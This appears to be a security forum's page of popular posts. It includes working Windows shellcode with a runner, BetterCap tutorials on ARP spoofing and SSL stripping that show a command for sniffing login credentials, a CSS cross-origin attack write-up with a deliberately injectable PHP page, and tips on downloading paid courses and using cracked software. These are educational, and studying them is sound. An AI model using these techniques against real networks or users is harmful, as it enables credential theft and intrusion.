Leaderboard

Popular Content

Showing content with the highest reputation on 02/16/16 in Posts

  1. Download: https://github.com/nishad/udemy-dl-windows/releases
     Create a new account on Udemy; it doesn't matter which email you use, because it doesn't have to be verified.
     Open the course you want and click Start Free Preview (it appears under Take This Course).
     Run the program like this: udemy-dl.exe -u email -p pass <link to course>
     Screenshots for the thick-headed:
     Happy learning
    8 points
  2. Windows x86 SwapMouseButton shellcode

     /*
     Title: Windows x86 SwapMouseButton shellcode
     Author: Ionut Popescu
     Date: December 2015
     Tested on: Windows 7/Windows 10
     Build/Run: Visual C++ Express Edition
     Shellcode written for educational purposes.
     Detailed description:
     - http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/
     - http://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/
     - http://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/
     */

     /*
     ; Shellcode details
     ; -----------------
     xor ecx, ecx
     mov eax, fs:[ecx + 0x30]             ; EAX = PEB
     mov eax, [eax + 0xc]                 ; EAX = PEB->Ldr
     mov esi, [eax + 0x14]                ; ESI = PEB->Ldr.InMemOrder
     lodsd                                ; EAX = Second module
     xchg eax, esi                        ; EAX = ESI, ESI = EAX
     lodsd                                ; EAX = Third(kernel32)
     mov ebx, [eax + 0x10]                ; EBX = Base address
     mov edx, [ebx + 0x3c]                ; EDX = DOS->e_lfanew
     add edx, ebx                         ; EDX = PE Header
     mov edx, [edx + 0x78]                ; EDX = Offset export table
     add edx, ebx                         ; EDX = Export table
     mov esi, [edx + 0x20]                ; ESI = Offset namestable
     add esi, ebx                         ; ESI = Names table
     xor ecx, ecx                         ; ECX = 0

     Get_Function:
     inc ecx                              ; Increment the ordinal
     lodsd                                ; Get name offset
     add eax, ebx                         ; Get function name
     cmp dword ptr[eax], 0x50746547       ; GetP
     jnz Get_Function
     cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA
     jnz Get_Function
     cmp dword ptr[eax + 0x8], 0x65726464 ; ddre
     jnz Get_Function
     mov esi, [edx + 0x24]                ; ESI = Offset ordinals
     add esi, ebx                         ; ESI = Ordinals table
     mov cx, [esi + ecx * 2]              ; Number of function
     dec ecx
     mov esi, [edx + 0x1c]                ; Offset address table
     add esi, ebx                         ; ESI = Address table
     mov edx, [esi + ecx * 4]             ; EDX = Pointer(offset)
     add edx, ebx                         ; EDX = GetProcAddress
     xor ecx, ecx                         ; ECX = 0
     push ebx                             ; Kernel32 base address
     push edx                             ; GetProcAddress
     push ecx                             ; 0
     push 0x41797261                      ; aryA
     push 0x7262694c                      ; Libr
     push 0x64616f4c                      ; Load
     push esp                             ; "LoadLibrary"
     push ebx                             ; Kernel32 base address
     call edx                             ; GetProcAddress(LL)
     add esp, 0xc                         ; pop "LoadLibrary"
     pop ecx                              ; ECX = 0
     push eax                             ; EAX = LoadLibrary
     push ecx
     mov cx, 0x6c6c                       ; ll
     push ecx
     push 0x642e3233                      ; 32.d
     push 0x72657375                      ; user
     push esp                             ; "user32.dll"
     call eax                             ; LoadLibrary("user32.dll")
     add esp, 0x10                        ; Clean stack
     mov edx, [esp + 0x4]                 ; EDX = GetProcAddress
     xor ecx, ecx                         ; ECX = 0
     push ecx
     mov ecx, 0x616E6F74                  ; tona
     push ecx
     sub dword ptr[esp + 0x3], 0x61       ; Remove "a"
     push 0x74754265                      ; eBut
     push 0x73756F4D                      ; Mous
     push 0x70617753                      ; Swap
     push esp                             ; "SwapMouseButton"
     push eax                             ; user32.dll address
     call edx                             ; GetProc(SwapMouseButton)
     add esp, 0x14                        ; Cleanup stack
     xor ecx, ecx                         ; ECX = 0
     inc ecx                              ; true
     push ecx                             ; 1
     call eax                             ; Swap!
     add esp, 0x4                         ; Clean stack
     pop edx                              ; GetProcAddress
     pop ebx                              ; kernel32.dll base address
     mov ecx, 0x61737365                  ; essa
     push ecx
     sub dword ptr [esp + 0x3], 0x61      ; Remove "a"
     push 0x636f7250                      ; Proc
     push 0x74697845                      ; Exit
     push esp                             ; "ExitProcess"
     push ebx                             ; kernel32.dll base address
     call edx                             ; GetProc(ExitProcess)
     xor ecx, ecx                         ; ECX = 0
     push ecx                             ; Return code = 0
     call eax                             ; ExitProcess
     */

     #include "stdafx.h"
     #include <Windows.h>

     int main()
     {
         // Raw shellcode bytes; contains no NUL byte, so strlen() gives its length
         char *shellcode =
             "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
             "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\x65\x75"
             "\xE2\x8B\x72\x24\x03\xF3\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3\x8B\x14\x8E\x03\xD3\x33\xC9\x53\x52\x51\x68\x61\x72\x79\x41\x68"
             "\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C\x51\x68\x33\x32\x2E\x64\x68\x75\x73"
             "\x65\x72\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24\x04\x33\xC9\x51\xB9\x74\x6F\x6E\x61\x51\x83\x6C\x24\x03\x61\x68\x65\x42\x75\x74\x68"
             "\x4D\x6F\x75\x73\x68\x53\x77\x61\x70\x54\x50\xFF\xD2\x83\xC4\x14\x33\xC9"
             "\x41" // inc ecx - Remove this to restore the functionality
             "\x51\xFF\xD0\x83\xC4\x04\x5A\x5B\xB9\x65\x73\x73\x61"
             "\x51\x83\x6C\x24\x03\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54\x53\xFF\xD2\x33\xC9\x51\xFF\xD0";

         // Set memory as executable
         DWORD old = 0;
         BOOL ret = VirtualProtect(shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &old);

         // Call the shellcode (indirect jump through the pointer variable)
         __asm
         {
             jmp shellcode;
         }

         return 0;
     }
    5 points
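As an added illustration (not part of the original post), the "stack strings" the listing above builds can be reproduced in Python from the immediates in its comments: the 4-byte chunks are pushed in reverse order so the name reads forwards in memory, and `sub dword ptr [esp+3], 0x61` turns the padding 'a' of "tona"/"essa" into the NUL terminator. The constants below are copied from the listing; the 16 zero bytes standing in for whatever sits above ESP are a constructed filler.

```python
import struct

# Immediates copied from the listing above, in execution order.  The
# ("push", 0) entries stand for `push ecx` with ECX == 0 (the terminator),
# and 0x00006C6C is `mov cx, 0x6c6c` applied to a zeroed ECX.
LOADLIBRARY_OPS = [("push", 0), ("push", 0x41797261),          # aryA
                   ("push", 0x7262694C), ("push", 0x64616F4C)]  # Libr, Load
USER32_OPS = [("push", 0), ("push", 0x00006C6C),                # ll
              ("push", 0x642E3233), ("push", 0x72657375)]       # 32.d, user
SWAPMOUSE_OPS = [("push", 0), ("push", 0x616E6F74),             # tona
                 ("sub", 3, 0x61),                              # 'a' -> NUL
                 ("push", 0x74754265), ("push", 0x73756F4D),    # eBut, Mous
                 ("push", 0x70617753)]                          # Swap
EXITPROCESS_OPS = [("push", 0x61737365), ("sub", 3, 0x61),      # essa -> ess\0
                   ("push", 0x636F7250), ("push", 0x74697845)]  # Proc, Exit


def imm_to_ascii(imm):
    """Show a PUSH/CMP immediate as the 4 bytes it occupies in memory
    (little-endian), e.g. 0x50746547 -> 'GetP', the first compare of the
    GetProcAddress name search in the listing."""
    return struct.pack("<I", imm & 0xFFFFFFFF).decode("latin-1")


def run_stack_ops(ops, above=b"\0" * 16):
    """Simulate PUSH imm32 and SUB DWORD PTR [esp+off], val on a stack image.

    Index 0 of the returned bytes is ESP.  `above` is a constructed filler
    for whatever already sits above ESP; the `sub` at [esp+3] reads three
    bytes from there, exactly as it does on the real stack.
    """
    stack = bytearray(above)
    for op in ops:
        if op[0] == "push":
            stack[0:0] = struct.pack("<I", op[1] & 0xFFFFFFFF)   # ESP -= 4
        elif op[0] == "sub":
            _, off, val = op
            cur = struct.unpack("<I", bytes(stack[off:off + 4]))[0]
            stack[off:off + 4] = struct.pack("<I", (cur - val) & 0xFFFFFFFF)
        else:
            raise ValueError("unsupported op: %r" % (op,))
    return bytes(stack)


def decode_stack_string(ops):
    """Return the NUL-terminated ASCII string left at ESP by `ops`."""
    data = run_stack_ops(ops)
    end = data.find(b"\0")
    return data[:end if end >= 0 else len(data)].decode("ascii")


if __name__ == "__main__":
    for name, ops in [("LoadLibrary", LOADLIBRARY_OPS), ("user32", USER32_OPS),
                      ("SwapMouseButton", SWAPMOUSE_OPS),
                      ("ExitProcess", EXITPROCESS_OPS)]:
        print("%-16s -> %r" % (name, decode_stack_string(ops)))
    print("cmp immediates:", imm_to_ascii(0x50746547),
          imm_to_ascii(0x41636F72), imm_to_ascii(0x65726464))
```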
  3. Will you quit it with this crap? Good thing you put a signature in a font the size of a horse's dick for a referral link. It doesn't cross your mind to post anything worthwhile.
    4 points
  4. SSL Stripping and HSTS Bypass with BetterCap

     Since version 1.3.0 BetterCap is able to perform SSL stripping and since version 1.3.8 it also performs HSTS bypass, but what exactly are these techniques and how can we use them?

     SSL Stripping

     SSL stripping is a technique introduced by Moxie Marlinspike during BlackHat DC 2009; the website description of this technique goes like:

     Long story short, this technique will replace every https link in the web pages the target is browsing with http ones, so if a page would normally look like:

     ... <a href="https://www.facebook.com/">Login</a> ...

     during an SSL stripping attack its HTML code will be modified to:

     ... <a href="http://www.facebook.com/">Login</a> ...

     Being the man in the middle, this allows us to sniff and modify pages that normally we wouldn't be able to even see.

     HSTS Bypass

     SSL stripping worked quite well until 2010, when the HSTS specification was introduced. Wikipedia says:

     Moreover, HSTS policies have been prebuilt into major browsers, meaning that now, even with an SSL stripping attack running, the browser will connect to HTTPS anyway, even if the http:// scheme is specified, making the attack itself useless.

     Picture credits to Scott Helme

     For this reason, Leonardo Nve Egea presented sslstrip+ (or sslstrip2) during BlackHat Asia 2014. This tool was an improvement over Moxie's original version, specifically created to bypass HSTS policies. Since HSTS rules most of the time are applied on a per-hostname basis, the trick is to downgrade HTTPS links to HTTP and to prepend some custom subdomain name to them. Every resulting link won't be valid for any DNS server, but since we're MITMing we can resolve these hostnames anyway.

     Let's take the previous example page:

     ... <a href="https://www.facebook.com/">Login</a> ...

     An HSTS bypass attack will change it to something like:

     ... <a href="http://wwww.facebook.com/">Login</a> ...

     Notice that https has been downgraded to http and www replaced with wwww.

     When the "victim" clicks on that link, no HSTS rule will be applied (since there's no rule for the subdomain we just created) and the MITM software (BetterCap in our case) will take care of the DNS resolution, allowing us to see and alter the traffic we weren't supposed to see.

     Using BetterCap

     Using BetterCap to perform such an attack is very easy; there's no special command line argument for it, since everything (both SSL stripping and HSTS bypass) was implemented as a builtin feature of the transparent proxy. You only need to enable it:

     sudo bettercap --proxy -P POST

     The following screenshot was taken during a test run; as you can see, Facebook was successfully SSL-stripped and I was able to sniff login credentials in cleartext.

     Source: https://www.bettercap.org/blog/sslstripping-and-hsts-bypass/#.VsHQflQ9TwA.twitter
    2 points
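As an added example, not from the BetterCap post or project: this Python helper parses a Strict-Transport-Security header and evaluates whether a browser that has cached that policy would upgrade a given http:// host. It shows why the wwww.facebook.com trick above escapes a policy set only on www.facebook.com (wwww.facebook.com is a sibling, not a subdomain, of that host) and why only a policy on the parent domain with includeSubDomains, or preloading, closes the gap. The policy values are constructed for illustration, not Facebook's real headers.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class HstsPolicy:
    max_age: int                  # seconds; 0 tells the browser to forget the host
    include_subdomains: bool = False
    preload: bool = False


def parse_hsts(header_value):
    """Parse a Strict-Transport-Security header value (RFC 6797 section 6.1).

    Directive names are case-insensitive; max-age is mandatory, must appear
    once and must be a non-negative integer.  Returns None for a malformed
    policy, which a browser treats as "no HSTS" for that response.
    """
    max_age = None
    include_subdomains = preload = False
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        value = value.strip().strip('"')
        if name == "max-age":
            if max_age is not None or not value.isdigit():
                return None           # duplicate or non-numeric max-age
            max_age = int(value)
        elif name == "includesubdomains":
            include_subdomains = True
        elif name == "preload":
            preload = True
    if max_age is None:
        return None
    return HstsPolicy(max_age, include_subdomains, preload)


def is_subdomain_of(host, parent):
    """'wwww.facebook.com' is NOT a subdomain of 'www.facebook.com'; it is a
    sibling under 'facebook.com', which is the whole point of the bypass."""
    return host.endswith("." + parent)


def hsts_upgrades(known_hosts, request_host):
    """Decide whether http://request_host/ would be rewritten to https://.

    known_hosts maps hostnames the browser has already visited over HTTPS to
    the HstsPolicy received from them (the per-hostname cache the post refers
    to).  A host never seen over HTTPS is not upgraded; that "first visit"
    gap is what the browser preload list exists to close.
    """
    request_host = request_host.lower().rstrip(".")
    for host, policy in known_hosts.items():
        if policy is None or policy.max_age <= 0:
            continue
        if request_host == host:
            return True
        if policy.include_subdomains and is_subdomain_of(request_host, host):
            return True
    return False


def link_escapes_hsts(known_hosts, stripped_host="wwww.facebook.com"):
    """True when the downgraded link with the fabricated subdomain would
    NOT be upgraded, i.e. the policy leaves the described gap open."""
    return not hsts_upgrades(known_hosts, stripped_host)


# Constructed scenario: policies the browser has cached from earlier visits.
PER_HOST_ONLY = {"www.facebook.com": parse_hsts("max-age=31536000")}
APEX_WITH_SUBDOMAINS = {
    "facebook.com": parse_hsts("max-age=31536000; includeSubDomains; preload")}

if __name__ == "__main__":
    print("policy on www host only, link escapes HSTS:",
          link_escapes_hsts(PER_HOST_ONLY))
    print("policy on apex + includeSubDomains, link escapes HSTS:",
          link_escapes_hsts(APEX_WITH_SUBDOMAINS))
```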
  5. Malwarebytes Anti-Ransomware uses advanced proactive technology that monitors what ransomware is doing and stops it cold before it even touches your files. It has no shot at encrypting. And it does not rely on signatures or heuristics, so it’s light and completely compatible with antivirus. These methods proved to be so successful at stopping ransomware that Malwarebytes Anti-Ransomware detected all of the latest and most dangerous ransomware variants right out of development and into beta 1. This means when running Malwarebytes Anti-Ransomware, you do not have to worry about getting infected by CryptoLocker, CryptoWall, or CTBLocker. Better yet, it can defeat new ransomware the moment it is released, proactively protecting you from ransomware that’s never even been seen before. Malwarebytes Anti-Ransomware open beta starts today and is available for anyone to install and try out. Please keep in mind that this is the first beta and there may be some bugs or issues that need to be worked out, so we encourage you to try it out in a non-production environment first. Download Beta https://malwarebytes.box.com/s/uluqe6ms2l36bsxkudurlr7yr8lp6d8g
    2 points
  6. Hi,

     We've discussed this subject before; unfortunately I think some of the topics were lost, but the forum update is a good sign, and articles can be written at any time. For those of you who have written to me lately here, on Skype, Facebook etc., I'll try to answer here, since the forum is public and it might help others too. I won't go over again what I do and how I do it; I'll try to answer a few questions.

     1) Do you need a company to start a dropshipping business? If you want it to be something serious, I recommend setting one up. At the beginning you won't need it, but over time you'll be transacting more and more money and you'll need a company; PayPal will start asking questions and it will get stressful.

     2) What knowledge do you need? Computer use and intermediate English. You do indeed need an online store, but there are 100000+ tutorials, you don't need special knowledge, or you can use Shopify!

     3) Where do I get the products from? From anywhere! That is, if you don't own a company. If you have a company, which I also recommend, suppliers can be found: there are marketplaces for this, one example is Doba. If you don't have a company and are still looking for a supplier, you can take a look here: http://www.blackhatworld.com/blackhat-seo/f68-dropshipping-wholesale-hookups/

     4) How much time does it take? I also have a job... and... Me too, yes, I have a job as well; true, it's more relaxed, but I have an 8-hour schedule and I still somehow manage to take care of dropshipping too. I prefer to have a job while also working on my business, until I save up enough money to invest in something better, or to expand what I already have.

     5) I have a site, I've planned everything, but I have nobody to sell to! The paid (and fast) method: you spend money to make money! = Facebook Ads, Google AdWords, SEO campaigns. The free method: social media pages -> sharing in all the groups in your niche + "Buy & Sell" type groups, follow 4 follow, pin, etc... it depends on the network.

     SEO -> I think you can optimize the pages yourself without anyone's help, there's far too much information on the internet; then you can passively start building backlinks, social signals, etc.

     6) What payment systems do you use?! Before having a company I used only PayPal, because it lets those who don't have an account pay by card too; now I have a company and have integrated almost all the systems: card, PayPal, Western etc.

     7) How much should I mark up the product prices?! My formula: PRODUCT PRICE + PRICE OF THE FASTEST SHIPPING + 20 - 40 % - this also depends on the value of the product.

     8) What do I do if someone asks me for contact details?! Did you grow up in a cave? Or maybe you're mute, in which case I understand; if neither applies, you go nicely to Skype, buy a phone number from them, redirect it to your own phone number and talk to people.

     9) What do I do if I don't know English?! Pass!

     10) How much profit do you make and how quickly did you start earning money? I make enough, otherwise I wouldn't be keeping at the business and I wouldn't have set up a company for these things. How quickly? For me, from day one, because I already had a few social media accounts set up for these things.

     11) Can you give me a link to your sites and / or your pages?! NO.

     These are the most common questions I get. Dropshipping is out in the open for everyone; it's no secret, you can all do it, so stop saying that money can't be made on the internet! As a good friend of mine used to say: "Real money on the internet is made by brokering services.... that guy has the product, you sell it, period." All the best and happy earning!
    1 point
  7. Hi,

     18 days ago I created a topic right here on this forum asking whether anyone does Amazon Associates (the topic here), a topic that nobody answered, so I tend to believe either there are no people doing this, or those who already do don't want to reveal Amazon's secrets. I started reading up, to see what and how, what the rules are, what I need etc. Because I'm already doing dropshipping in a certain niche, I decided that on Amazon I'd go with the same niche, because I already had social media pages built up with people who had bought, pages I built by hand and where I've earned a certain level of trust. As I've said in my other topics, I sell only through social media; I have nothing to do with search engines. I've been struggling for about 2 days to write these lines; this is not an article, I like to call it motivation, because I was hoping to find a few more people willing to make money and learn with Amazon. On the 1st I made the topic and on the evening of the 2nd I already had the site set up with Amazon's system integrated, about 60% automated. These are my earnings from the 2nd to the 16th of this month:

     My potential customers are roughly 200,000 if I add up everyone I have on social media (Facebook, Twitter, Instagram, Pinterest).

     Now let me tell you what you need:
     - a domain + hosting
     - WordPress
     - automation plugins (WooCommerce Amazon Affiliates, Prosociate)
     - a niche
     - time to build a few social media pages in certain niches (if you have 10-15 dollars I think you can buy one; yesterday I bought an Instagram account with 66k on my niche for $25), or if you're good and have the knowledge, you go for SEO and rely on search engines.
     - about an hour a day to add new products (it's done automatically, you just have to choose them)

     In short, you need about 10-15 dollars to get a domain and decent hosting for a month, and the rest of the resources can be found free / cracked, which you can use until you can afford to buy them.

     PS: If anyone wants to learn more, this topic was enough for me personally.

     Happy earning
    1 point
  8. Intro to ARP spoofing with bettercap

     I recently discovered a fairly new man-in-the-middle tool called bettercap, which I will test in this video. I will explain the concept of ARP spoofing, install bettercap, and see how one can use it to sniff passwords on a network. Here it is:

     If you liked it, check out my other trainings: http://hackademy.aetherlab.net

     Source: http://aetherlab.net/2016/02/intro-to-arp-spoofing-with-bettercap/
    1 point
  9. 1 point
  10. ((void (*)(void))shellcode)();

     Defines a pointer to a function that returns nothing, has no parameters and has the address "shellcode", and calls it. But that memory region still has to be marked "RWX" with VirtualProtect. Example: https://www.exploit-db.com/exploits/38959/
    1 point
  11. Script Deobfuscator Released

     Posted on February 15, 2016 by darryl

     The purpose of this tool is to help you perform static analysis on obfuscated scripts. It's often easier to dynamically analyze scripts, but there are times when you just don't know where to start or you just want a high-level view of what's going on with the script. This tool may be able to help you. I already wrote a tool called PHP Script Decoder, but this new version has been re-written in .NET with new functionality and flexibility in order to handle PHP, JavaScript, VBA, and VBS scripts. To explain how to use this tool, let me show you how to tackle seven different obfuscated scripts.

     Example #1 (unphp)

     Here's what the script looks like. Looking at the script, you'll see an array of base64-encoded strings at the top. Following that are references to specific elements from the array. Paste in the script sections like so: the script you are trying to deobfuscate at the top, and the array of base64-encoded strings separated by commas in the middle section. I enter the search string value of "_705650624(#)" since that's how the script at the top references the elements from the array (note: the pound sign is a wildcard and must be present). I select the "Array" method and click on the "Convert" button. The results still show encoded strings, so now I check the "Base64 Decode", "Concatenate", and "Keep Quotes" options and try again. The script has been deobfuscated and is much easier to read. The script won't execute though, because the strings are quoted (or unquoted) incorrectly.

     Example #2 (ddecode)

     Here's the script we'll be working on: First we need to unescape it, so click on the "Unescape" button. If you right-click on the Output box, there's an option to save the results to a text file. (You can right-click on the Input box and read in a file too.) Click on "Copy Output to Input" to move the result to the top. This script uses randomized variable names and assigns a value to each one. The later portion references the value. The tool will parse the script and load each variable and associated value into an array. It then does a search for the variable and replaces it with the value. Choose the "Random Vars 1" method. The delimiter for this script is a semicolon and for the search string I enter ${"GLOBALS"}["#"]="*"; The pound sign is a placeholder for the variable name and the asterisk is the placeholder for the value. Here's the result:

     Example #3 (unphp)

     This script also uses random variable names, but in this version the strings are base64-encoded. The top portion defines the global variables while the lower section, beginning at "session_start()", references them. Paste the script sections in the tool as follows, then choose the "Random Vars 2" method and the "Base64 Decode" and "Keep Quotes" options. Note the search string has spaces in between so that it matches the script at the top.

     Example #4 (unphp)

     Here's what the script looks like (I highlighted the key): This script references an element in an array to build the values for its variables. The elements are based on the character position in the key. The first step is to paste the entire script in the input box and choose the key lookup option. I use $f9[#] as the search string. In the Lookup Key box, paste the key and remove the starting and ending quotes. Also make sure the key you paste in has been properly escaped. You can see there's concatenation going on, so check the "Concatenate" option.

     Example #5 (ddecode)

     In this example, we're just interested in decoding the base64 strings. Copy the entire script to the Input box, choose the "Base64" method as well as the "Base64 Decode", "Concatenate", and "Keep Quotes" options. Make sure the delimiter and search string match those of the script.

     Example #6 (pastebin)

     This script uses the Joomla exploit and contains decimal values, making it tough to see immediately what it does. Paste the script into the Input box and choose the "ASCII" method. Almost, but it's not concatenated. If you choose the "Concatenate" option, it won't clean up everything. In the "Output Options" section, there's a "Remove Chars" box. Enter a period and try again.

     Example #7 (pastebin)

     This last example is a VBA script. It does a simple math calculation, then the result is converted to its ASCII character equivalent. Paste the script in and choose the "Math" method. The result shows decimal values but not the text equivalent. So enter "chr(" into the "Pre Str" box and a closing parenthesis in the "Post Str" box. Look familiar? Now we can use the "ASCII" method to get the characters. I also entered an ampersand and space character in the "Remove Chars" box.

     The resulting deobfuscated script will probably error out if you try executing it. Again, all this tool will do is try to make the script readable so you can better understand it. You may need to use this tool on parts of the script, then put them back together yourself to figure things out. I tried to make the functions in this tool flexible and generic enough to handle whatever scripts come your way. However, if you encounter something new, please let me know. You can get the tool here. Happy reversing!

     Source: http://www.kahusecurity.com/2016/script-deobfuscator-released/
    1 point
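As an added example (not the tool's own code, which is a .NET GUI), here are the two substitution methods from examples #1 and #4 written out in Python: the "Array" method with Base64 Decode, Concatenate and Keep Quotes, and the key-lookup method with `$f9[#]` references, sharing one concatenation pass. The search-string syntax (`#` as the index wildcard) follows the post; the scripts, array and key below are constructed samples in the same shape as the real ones.

```python
import base64
import re

# A quoted PHP string literal, with backslash escapes allowed inside.
SINGLE = r"'((?:[^'\\]|\\.)*)'"
DOUBLE = r'"((?:[^"\\]|\\.)*)"'
QUOTED = re.compile(SINGLE + "|" + DOUBLE)
# 'a' . 'b'  (PHP concatenation of two single-quoted literals)
CONCAT = re.compile(SINGLE + r"\s*\.\s*" + SINGLE)


def _quote(s):
    """Wrap a recovered value in single quotes (the Keep Quotes option)."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def parse_quoted_list(array_literal):
    """Pull the quoted elements out of the comma-separated array body that
    goes in the tool's middle box; commas inside quotes do not split."""
    return [a if a else b for a, b in QUOTED.findall(array_literal)]


def substitute_refs(script, search_string, lookup):
    """Replace every reference matching search_string, where '#' stands for
    a decimal index, by the quoted value lookup(index).  References whose
    index is unknown are left in place so the analyst can still see them."""
    head, _, tail = search_string.partition("#")
    pattern = re.escape(head) + r"(\d+)" + re.escape(tail)

    def repl(m):
        try:
            return _quote(lookup(int(m.group(1))))
        except (IndexError, KeyError):
            return m.group(0)
    return re.sub(pattern, repl, script)


def concatenate(script):
    """Fold 'a' . 'b' into 'ab' repeatedly (the Concatenate option)."""
    while True:
        folded = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if folded == script:
            return folded
        script = folded


def array_method(script, array_literal, search_string, base64_decode=True):
    """Example #1: references like _705650624(3) index a base64 array."""
    elements = parse_quoted_list(array_literal)
    if base64_decode:
        elements = [base64.b64decode(e).decode("utf-8", "replace")
                    for e in elements]
    return concatenate(substitute_refs(script, search_string,
                                       lambda i: elements[i]))


def key_lookup_method(script, key, search_string):
    """Example #4: references like $f9[12] pick one character of a key."""
    return concatenate(substitute_refs(script, search_string, lambda i: key[i]))


# Constructed samples in the shape of the scripts discussed above.
SAMPLE_ARRAY = "'ZXZhbA==', 'YmFzZTY0X2Rl', 'Y29kZQ==', 'JF9QT1NUWyJjIl0='"
SAMPLE_SCRIPT = "$x = _705650624(0)(_705650624(1) . _705650624(2)(_705650624(3)));"
SAMPLE_KEY = "abcdefghijklmnopqrstuvwxyz_0123456789"
SAMPLE_KEY_SCRIPT = "$f = $f9[4].$f9[21].$f9[0].$f9[11]; $g = $f9[99];"

if __name__ == "__main__":
    print(array_method(SAMPLE_SCRIPT, SAMPLE_ARRAY, "_705650624(#)"))
    print(key_lookup_method(SAMPLE_KEY_SCRIPT, SAMPLE_KEY, "$f9[#]"))
```

As in the tool, the output is readable rather than executable: every recovered value stays single-quoted, which is what makes the eval/base64_decode chain visible at a glance.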
  12. Stealing Secrets with CSS: Cross Origin CSS Attacks

     In this post I'm going to discuss a web attack that was designated CVE-2015-5826 and CVE-2015-1287, which abuses the way CSS parsing works in some browsers and expands the way we think about HTML injection attacks.

     Introduction

     CSS cross-origin attacks work by constructing CSS style sheets from vulnerable pages and extracting sensitive information from these pages in the form of CSS property attributes. Vulnerable pages include any page that allows an attacker to inject arbitrary, unhindered printable alphanumeric text including braces, brackets and parentheses; basically any subset of the ASCII table that allows you to construct valid CSS. Attacks with an even more restricted character set may be possible depending on the content of the vulnerable page. Most modern browsers including Firefox, Chrome and Opera have recently included defenses for this attack, although for outdated browsers this attack still poses a threat. In order to have an HTML page treated as CSS the browser needs to operate in Quirks Mode; the following section explains what this "mode" is and how it works.

     Quirks Mode

     CSS parsers can be configured to run in a "greedy" or "best effort" mode, in which they ignore anything that isn't CSS syntax and gobble up everything else in an effort to deliver as user-friendly and backward-compatible an experience as possible (if I had 1 cent for every time a user experience decision caused a security vulnerability...). The idea comes from the days when browsers were few and far between (there was basically Netscape and Microsoft Explorer) and this meant there was little in the way of standardizing web scripting; well, there wasn't any need to.

     The W3C then introduced standards in order to try (as futile as that try was) to civilize the web to some extent, but this meant that if browsers adopted these standards cold turkey there would be tons of web pages written according to the old lore that would not work anymore; thus a special operating mode was introduced to accommodate these pages. This "special operating" mode is called Quirks Mode and can be triggered by starting off an HTML document with an invalid Document Type Declaration. For some browsers Quirks Mode introduces behavior more interesting than just ignoring faulty CSS: it affects the way Content-Type headers are interpreted. For instance, in Quirks Mode, if CSS is loaded or referenced in a link or style element, the Content-Type header will be ignored and the content returned will be interpreted as CSS! To quote:

     Stylesheets linked in the document with an advisory mime type of text/css will still be treated as CSS even if the server gives a Content-Type header other than text/css. -- https://developer.mozilla.org/en-US/docs/Mozilla_Quirks_Mode_Behavior

     Of course, what that means is that any kind of document can then be treated as CSS, which means that if, as an attacker, you can inject a document into a style-sheet reference, it gives you tremendous freedom! You might even be able to have an injectable HTML document be treated as CSS itself. That last sentence was pretty important; it's actually the realization that this post is trying to share with you, so if you don't completely get it please re-read it until you do. Besides Quirks Mode, of course, there's the fully standards-compliant mode called Standards Mode; this is only engaged when an HTML document is started with a valid DTD. So if an HTML document starts off with a DTD that looks like this:

     <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

     or any other valid DTD, it will parse the entire document in Standards Mode. And the following DTDs are examples that will trigger Quirks Mode in most modern browsers:

     <!DOCTYPE html PUBLIC >
     <!DOCTYPE html BLAH>
     <!DOCTYPE>

     Basically any non-valid DTD. You can check which mode a browser is parsing HTML in by inspecting the document.compatMode property via JavaScript, as follows:

     document.compatMode == "CSS1Compat" ? "Browser is in Standards Mode" : "Browser is in Quirks Mode"

     Here are some screenshots of that little script in action with some examples of DTDs that trigger the two parsing modes:

     Browser parsing in Standards Mode
     Browser parsing in Quirks Mode

     And here's a summary of how different browsers behave according to my research on the subject:

     Summary of how browsers respond to some DTDs for HTML
     *Q - Quirks Mode
     *S - Standards Mode
     *Tests were done using Firefox 44.0.2, Opera 35.0, Chrome 48.0

     Obviously, upon finding out that Quirks Mode will force browsers to ignore Content-Type headers, I had to check it out for myself; here are a couple of screenshots of me doing that:

     In the screenshot above we can see Firefox loading up the HTML page shown in the bottom right, which references the CSS shown in the bottom left. I'm using PHP to force my Apache2 web server to return a Content-Type header of text/plain, which means it's just basic text. And as you can see, the browser's console appropriately warns us that some text is trying to be loaded as CSS.

     Exactly the same situation as the previous screenshot, except that the DTD of the HTML page being loaded forces the browser into Quirks Mode, and as a result the CSS (being served with a text/plain MIME type) is parsed and applied to the text on the page!

     The Setup

     So that is the awesomeness that is Quirks Mode; let's talk about the vulnerability for a second. In this scenario we have a simple page vulnerable to injection. We need to clear up a few rules of engagement here though; when I say "vulnerable to injection" I mean the following:

     only alphanumerics, quotes " ' and braces {}, brackets [] and parentheses ()
     we can exclude any active content injection from this case as well

     In this example I'm using the same origin to host the attack page; this is merely for demonstration purposes and because all the browsers I currently have include protections for the attack. So basically you have a page in which you can influence the text content. Here's the page I'm going to use for this demonstration:

     <?php
     echo "
     <!DOCTYPE html asfdasfdadf>
     <html>
     <head>
     <link rel=\"stylesheet\" href=\"incorrectMime.php?type=plain\">
     </head>
     <div id=\"text\">
     This text should be red <br>
     </div>
     Injection point: ".$_GET["injectme"]." secret goes here'}
     </html>";
     ?>

     Obviously there is no hindrance here to a full-on XSS attack; you would just need to imagine that there's some hectic WAF blocking anything that could be used to execute XSS.

     The Attack

